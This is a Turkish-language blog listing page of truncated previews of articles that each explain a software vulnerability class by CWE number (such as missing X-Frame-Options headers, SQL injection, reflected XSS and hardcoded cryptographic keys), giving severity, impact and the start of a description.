| Bu makalede Missing X-Content-Type-Options Header (CWE-16), yani Eksik X-Content-Type-Options Başlığı, diğer bir ifadeyle; XSS (Content-Sniffing) Saldırılarına Karşı Koruma Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas bilgilere yetkisiz erişim, Uzaktan kod çalıştırma
Açıklığın Açıklaması:
Web tarayıcılar web sunuculardan gelen yanıt paketlerini okurlarken yanıt paketlerindeki Content-Type başlığın... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 08:05:58'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing X-Frame-Options Header (CWE-1021), yani Eksik X-Frame-Options Başlığı, diğer bir ifadeyle; Clickjacking Saldırılarına Karşı KOruma Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Kullanıcılara fark ettirmeden istemediği eylemleri gerçekleştirtme
Açıklığın Açıklaması:
Clickjacking web site ziyaretçilerinin farkına varmadan farklı bir web sayfa öğesine tıklamaları sonucu yaşanan saldırıla... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 08:18:13'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Missing X-Frame-Options in Spring (CWE-1021), yani Spring Framework'ünde Eksik X-Frame-Options Başlığı açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Clickjacking saldırılarına karşı savunmasız kalma
Açıklığın Açıklaması:
Clickjacking web site ziyaretçilerinin farkına varmadan farklı bir web sayfa öğesine tıklamaları sonucu yaşanan saldırılara denir. Birçok clickjacking saldırı türü vardır. Bunlar arasınd... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 08:39:00'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Not Static Final Logger (CWE-398), yani Static Final Olmayan Log Alma Nesnesi, diğer ifadeyle; Güvenli Olmayan Log Alma Nesnesi açıklığı anlatılacktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Log verisi sızıntısı
Açıklığın Açıklaması:
Nesne yönelimli programlamada "private" belirteci üyelerin (field'ların, metotların veya constructor'ların) yalnızca deklare edildikleri aynı class'da kullanılabileceği kısıtını koyar. Bu be... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 08:49:46'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Not Using a Random IV with CBC Mode (CWE-329), yani CBC Mod ile Rastgele IV Kullanılmaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Gizlilik İhlali
Açıklığın Açıklaması:
Uygulamalar tahmin edilebilir “CBC Mod için IV (Initilization Vector)” değeri kullandıklarında bu durum güvenlik riski oluşturur. Örneğin oturum id’lerinin tahmin edilebilmesi ve saldırganın otur... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 08:58:46'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Object Hijack (CWE-491), yani Nesne Kaçırma açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
Nesne yönelimli programlama dillerinde “nesne kopyalama” var olan bir nesnenin kopyasını oluşturmaya denir. Nesne kopyalama ile kastedilen sıfırdan bir nesne oluşturmak yerine var olan bir nesnenin tüm özelliklerini içeren aynı türden, fakat farklı referanslı bir nesne oluşturmakt... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 09:14:26'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Off By One Error (CWE-193), yani Off By One Hatası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
[C/C++’da Yüksek] [Java’da Düşük]
Açıklığın Etkisi:
Servis dışı kalma, uzaktan komut çalıştırma
Açıklığın Açıklaması:
Değişkenleri bellekte oluştururken boyutunu (size) veya uzunluğunu (length) belirlemede bir kademe sapma sonucu hesaplama hatası çoğu zaman meydana gelebilir. Örneğin döngülerde 2 boyutlu bir dizi alanı tahsis edili... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 09:37:23'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Password in Configuration File (CWE-260) (CWE-313), yani Konfigürasyon Dosyasında Açık Metin Parola, diğer bir ifadeyle; Yapılandırma Dosyasında Şifrelenmemiş Parola açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Bilgi İfşası, Sızma girişimlerinde saldırının boyutunun artması
Açıklığın Açıklaması:
Uygulama geliştiricileri uygulamalarını daha modüler ve güvenli hale getireb... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 12:45:10'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Overly Permissive Content Security Policy (CWE-346), yani Aşırı izinli Content SEcurity Policy açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
XSS saldırılarına maruz kalma, Clickjacking saldırılarına maruz kalma, İçerik Sahteciliği saldırılarına maruz kalma
Açıklığın Açıklaması:
Content-Security-Policy başlığı mevcut web sayfasındaki bir script, bir gömülü child (alt) frame, bir gömülü parent (üst) fram... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 13:25:23'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Persistent Connection String (CWE-257), yani Kalıcı Bağlantı Dizesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Hassas Bilgilerin Ele Geçmesi
Açıklığın Açıklaması:
Bir uygulamayı güvenli hale getirirken veri kaynaklarına erişimi koruma en önemli hedeflerden biridir. Bir veri kaynağına (veritabanına) bağlanmayı sağlayan bağlantı dizesi güvenli hale getirilmemişse potansiyel olarak bir açıklık sunar. Ba... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 13:41:57'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Potential Clickjacking on Legacy Browsers (CWE-693), yani Eski Web Tarayıcılar için Clickjacking Önlemi Eksikliği açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Kullanıcı Fark etmeden Kullanıcıya İşlem Yaptırma
Açıklığın Açıklaması:
Bir web sayfada kullanıcının fare tıkının çalınmasına clickjacking saldırısı adı verilir. Bu saldırıda web sayfa görünmez olarak <iframe>’lenir ve sahte/korsan bir web say... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 14:24:27'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Privacy Violation (CWE-359) (CWE-200), yani Gizlilik İhlali açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Kişisel kullanıcı bilgilerinin yetkisiz aktörlerce görüntülenebilmesi
Açıklığın Açıklaması:
Uygulamalar tasarımlarına göre kullanıcılarına ait kişisel veriler toplayabilirler, işleyebilirler, depolayabilirler veya farklı bir noktaya gönderebilirler. Bu kişisel verilerin topluca adına PII (Personel Id... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 14:40:44'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Private Array Returned From A Public Method (CWE-495), yani Public Bir Metottan Private Dizi Döndürülmesi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Private dizinin dışarıdan modifiye edilebilmesi
Açıklığın Açıklaması:
Class’larda (sınıflarda) dizi veri tipli instance variable’lar (diğer adıyla field’lar, Türkçesiyle sınıf değişkenleri) değişebilir nesnelerdir. Yani bu türden nesneler üzerine yazma ... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 15:43:08'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Public Data Assigned to Private Array (CWE-496), yani Private Diziye Atanmış Public Veri açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Private dizinin dışarıdan modifiye edilebilmesi
Açıklığın Açıklaması:
Nesne yönelimli programlamalarda private tanımlanmış bir sınıf field (üye) dizisi encapsulation prensibi gereği sadece aynı sınıfın kendi metotları üzerinden erişilebilir ve modifiye edilebilirdir. An... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 16:39:39'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Public Static Field Not Marked Final (CWE-500), yani Public Static Üye Değişkenin Final Olarak Tanımlanmaması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Saldırı yüzeyinin artması
Açıklığın Açıklaması:
Bir nesnenin public üye değişkenleri (member fields) harici class’lar tarafından değiştirilebilirdirler. Genellikle nesnelerin üye değişkenlerine harici class’ların doğrudan erişmesi istenmez. Örneğin i... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 16:53:30'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Reflected XSS All Clients (CWE-79), yani Yansıtılmış Siteler Arası Betik Çalıştırma açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Kullanıcı hesaplarının çalınması, kullanıcıların ddos saldırılarında bot olarak kullanılması, kullanıcıların oltalama saldırılarına maruz kalması, web sitenin defacement’a maruz kalması
Açıklığın Açıklaması:
XSS web uygulamalarda kullanıcının uygulama girdi noktasına girmesi... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 17:06:42'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Return Inside Finally Block (CWE-584), yani Finally Blok İçerisinde Return İfadesi Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Dayanıklılık eksikliği
Açıklığın Açıklaması:
“Try-Finally” blok kullanımlarında - yani catch’in yer almadığı kullanımlarda - try bloğunda bir istisna fırladığında önce finally bloğuna gidilir, ardından istisna bir üst bloğa fırlar veya bu kullanımlarda try bloğund... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 18:14:42'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Serializable Class Containing Sensitive Data (CWE-499), yani Hassas Veri İçeren Serileştirilebilir Sınıf Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi sızıntısı
Açıklığın Açıklaması:
Nesne yönelimli programlama dillerinde nesne serileştirme adlı verilen bir mekanizma sunulur. Bu mekanizmaya göre kaynak kodda oluşturulmuş ve RAM’e yerleşmiş bir nesne tüm field’ları (değerleri dahil) ... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 20:05:15'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede SQL Injection (CWE-89), yani SQL Enjeksiyonu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Kritik
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Veri tabanı Üzerinde Keyfi Sorgu Çalıştırma, Sistem Kabuğunda Keyfi Komut Çalıştırma
Açıklığın Açıklaması:
Uygulamalar verdikleri hizmetin şekline ve kapsamına göre kullanıcılardan değerler alabilirler, bu bilgiler doğrultusunda bir takım bilgiler sunabilirler ve bu bilgiler üzer... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 20:22:05'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Stored Command Argument Injection (CWE-88), yani Depolu Komut Argümanı Enjeksiyonu açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Komut çalıştırma, tampon taşırma, dizin gezinme, kod çalıştırma
Açıklığın Açıklaması:
Geliştiriciler uygulamalarında kabuk (shell) komutu çalıştırmak için (yani uygulamalarının dışında harici bir program çalıştırmak için) komutları ve parametre & argümanlarını string (dize) şe... [Devamı] |
| Bu yazı 25.10.2025 tarihinde, saat 20:47:08'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Stored Log Forging (CWE-117), yani Depolu Log Taklit Etme açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Uygulama verisini modifiye etme, aktiviteleri gizleme, yetkisiz kod veya komutlar çalıştırma
Açıklığın Açıklaması:
Uygulamalar bir hata meydana geldiğinde hata ayıklama için veya saldırı meydana geldiğinde gereken aksiyonu belirlemek için log kaydı alma mekanizmalarını kullanırlar. İstemci girdilerini... [Devamı] |
| Bu yazı 26.10.2025 tarihinde, saat 23:51:25'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Suspicious Comments (CWE-546) (CWE-615), yani Şüpheli Yorumlar açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi ifşası
Açıklığın Açıklaması:
Uygulamada kaynak kodlar “bir hatanın (bug’ın) varlığını”, “tamamlanmamış bir fonksiyonun ifadesini” veya bir güvenlik zafiyetinin ifadesini içeren yorumlara sahip olabilmekteler. Örneğin; BUG, FIXME, HACK, TODO, LATER, LATER2 gibi ifadelerle yapılması icap ed... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 00:11:30'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede TruffleHog HighEntropy Strings (CWE-798), yani TruffleHog Yüksek Entropili Dize Bulunması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Hassas bilgilere yetkisiz erişim, bilgi ifşası
Açıklığın Açıklaması:
Kaynak kodlarda ya da yapılandırma dosyalarında gizli dizeler yer verilmesi “TruffleHog Yüksek Entropili Dize Bulunması (CWE-798)” açıklığı olarak ele alınır. TruffleHog yüksek entropili dizeleri kayna... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 00:18:14'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unencrypted Web Config File (CWE-312), yani Şifrelenmemiş Web Config Dosyası açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Bilgi İfşası
Açıklığın Açıklaması:
ASP.NET web uygulamalarda web.config dosyaları hassas veriler içerebilmektedir. Örneğin servis hesap bilgileri veya bağlantı dizeleri gibi. Bu hassas veriler güvenli bir şekilde depolanmalıdır. Aksi takdirde yerel dosya sistemine sızan bir saldırga... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 00:28:08'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unrestricted File Upload (CWE-434), yani Kısıtlanmamış Dosya Yükleme açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Servis Dışı Kalma
Açıklığın Açıklaması:
Uygulamalarda kullanıcıların sınırsız boyutta dosya kaydetmesine izin verilmesi saldırganların dosya deposunu gereksiz/çöp dosyalarla doldurmasına veya dosya kaydetme işlemini yürüten işleyişi zorlayacak uzun yazma işlemleri gerçekleştirmelerine nede... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 00:58:19'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unrestricted File Upload with Dangerous Type (CWE-434), yani Tehlikeli Dosya Yükleme açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Uzaktan kod çalıştırma
Açıklığın Açıklaması:
Uygulamalar özellik olarak kullanıcılarına dosya yüklemelerine (upload’a) izin verebilirler. Uygulamalar eğer kullanıcılarının yüklediği dosyalarda içerik ve/veya uzantı doğrulama kontrolü uygulamazlarsa bu durum saldırganlara ça... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 01:05:23'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unsafe Use of Target Blank (CWE-1022), yani Güvensiz Target Blank Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Oltalama saldırılarıyla karşı karşıya kalma
Açıklığın Açıklaması:
Web uygulamalarda html'deki <a> etiketi target="_blank" ile kullanıldığında link tıklaması sonucu açılan sayfa yeni sekmede açılır. Fakat target="_blank" ile açılan sayfalar bir önceki sayfanın window opener nesn... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 01:21:27'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unused Variables (CWE-563), yani Kullanılmamış Değişkenler açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Kod kalitesinin düşmesi
Açıklığın Açıklaması:
Bir değişken (variable) / bir nesne değişkeni (instance variable) tanımlandığında veya bir değer atamasına tabi tutulduğunda, fakat sonra hiçbir kapsamda (scope’ta) kullanılmadığında “Kullanılmamış Değişkenler (CWE-563)” açıklığı olarak ele alınır. Bu aç... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 01:51:40'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Use of Hardcoded Cryptographic Key (CWE-321), yani Koda Kriptografik Anahtar Yazılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Hassas Bilgilere Yetkisiz Erişim, Bilgi İfşası, Sızma girişimlerinde saldırının boyutunun artması
Açıklığın Açıklaması:
Uygulama kaynak kodları hassas verileri şifreleme ve deşifreleme için şifreleme anahtarı kullanabilirler. Bu ihtiyaçtan dolayı gerekli olabilir. Fakat kay... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 02:35:49'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Use of Non-Cryptographic Random (CWE-330), yani Kriptografik Olmayan Zayıf PRNG Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Yetkisiz Erişim
Açıklığın Açıklaması:
Uygulama dünyasında oturum jetonları (session token’lar), eposta doğrulama linkleri, captcha gibi birçok alanda sözde rastgele sayı üreteçleri (yani PRNG - Pseudo Random Number Generator) kullanılmaktadır. Sözde rastgele sayı üre... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 02:53:03'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Use of NullPointerException Catch to Detect Null Pointer Dereference (CWE-395), yani Null İşaretçi Değeri Kullanımını Saptamak İçin NullPointerException Catch’i Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Kaynak Tüketimi, Servis Dışı Kalma
Açıklığın Açıklaması:
“Null İşaretçi Değerini Kullanma” piyasada oldukça yaygın bir şekilde uygulamalarda bulunan bir açıklık olarak öne çıkmaktadır. ... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 03:08:31'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Use of System Exit (CWE-382), yani System.Exit() Kullanılması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Düşük
Açıklığın Etkisi:
Servis Dışı Kalma
Açıklığın Açıklaması:
Java uygulamalardaki java.lang.System.exit() metodu Java Virtual Machine’i sonlandırarak mevcut programdan çıkış yapmayı sağlar. Bu metoda argüman olarak 0’dan farklı bir değer verilmesi genellikle anormal sonlandırmayı belirtmek için kullanılır. Java’daki b... [Devamı] |
| Bu yazı 27.10.2025 tarihinde, saat 03:26:38'de yazılmıştır. |
|
| |
